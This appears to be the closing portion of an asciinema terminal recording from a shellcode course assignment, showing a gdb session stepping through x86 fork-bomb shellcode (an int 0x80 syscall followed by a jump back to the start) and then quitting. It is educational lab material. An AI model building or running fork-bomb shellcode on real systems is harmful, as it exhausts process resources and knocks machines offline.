[76.875008, "o", "q"]
[76.987218, "o", "u"]
[77.18051, "o", "i"]
[77.32329, "o", "t"]
[77.49947, "o", "\u001b[1;23r\u001b[5S\u001b[19;1HA debugging session is active.\u001b[21;9HInferior 1 [process 1292] will be killed.\u001b[23;1HQuit anyway? (y or n) \u001b[1;24r\u001b[23;23H"]
[78.412658, "o", "y"]
[78.507196, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[78.515369, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                               \u001b[23;1H \r"]
[78.516791, "o", "\u001b[1;23r\u001b[23;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b[1;24r\u001b[23;60H\u001b(B\u001b[m"]
[78.517103, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[78.517315, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[78.526472, "o", "\u001b[K"]
[78.526945, "o", "\u001b[?2004h"]
[79.197212, "o", "\u001b]0;SLAE ❐ SLAE ● 1 zsh\u0007\u001b[?25l\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1msh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m⌨   ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;4H\u001b[?12l\u001b"]
[79.202392, "o", "[?25h"]
[79.301223, "o", "\u001b[?25l\u001b[H0x0040201a in code ()\u001b[K\r\n(gdb)\u001b[K\r\neax            0x2      2\u001b[K\r\nebx            0x401fd4 4202452\u001b[K\r\necx            0x0      0\u001b[K\r\nedx            0xb7fb7890       -1208256368\u001b[K\r\nDump of assembler code from 0x40201c to 0x402026:\u001b[K\r\n=> 0x0040201c <code+20>:        int    0x80\u001b[K\r\n   0x0040201e <code+22>:        jmp    0x402008 <code>\u001b[K\r\n   0x00402020 <code+24>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402022:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402024:  add    B"]
[79.301519, "o", "YTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x0040201c in code ()\u001b[K\r\n(gdb) now fork bomb will happen :)Quit\u001b[K\r\n(gdb) quit\u001b[K\r\nA debugging session is active.\u001b[K\r\n\u001b[K\r\n        Inferior 1 [process 1292] will be killed.\u001b[K\r\n\u001b[K\r\nQuit anyway? (y or n) y\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 41m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1msh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m⌨   ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;4H\u001b[?12l\u001b[?25h"]
[79.384672, "o", "\u001b[?25l\u001b[H0x0040201a in code ()\u001b[K\r\n(gdb)\u001b[K\r\neax            0x2      2\u001b[K\r\nebx            0x401fd4 4202452\u001b[K\r\necx            0x0      0\u001b[K\r\nedx            0xb7fb7890       -1208256368\u001b[K\r\nDump of assembler code from 0x40201c to 0x402026:\u001b[K\r\n=> 0x0040201c <code+20>:        int    0x80\u001b[K\r\n   0x0040201e <code+22>:        jmp    0x402008 <code>\u001b[K\r\n   0x00402020 <code+24>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402022:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402024:  add    B"]
[79.384965, "o", "YTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x0040201c in code ()\u001b[K\r\n(gdb) now fork bomb will happen :)Quit\u001b[K\r\n(gdb) quit\u001b[K\r\nA debugging session is active.\u001b[K\r\n\u001b[K\r\n        Inferior 1 [process 1292] will be killed.\u001b[K\r\n\u001b[K\r\nQuit anyway? (y or n) y\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 41m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1msh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m⌨   ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;4H\u001b[?12l\u001b[?25h"]
[79.547474, "o", "\u001b[?25l\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 41m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;4H\u001b[?12l\u001b[?25h"]
[79.54829, "o", "\u001b[1;24r\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b[?2004l\u001b]112\u0007\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b[?1004l\u001b[?1049l\u001b[23;0;0t[detached (from session SLAE)]\r\n"]
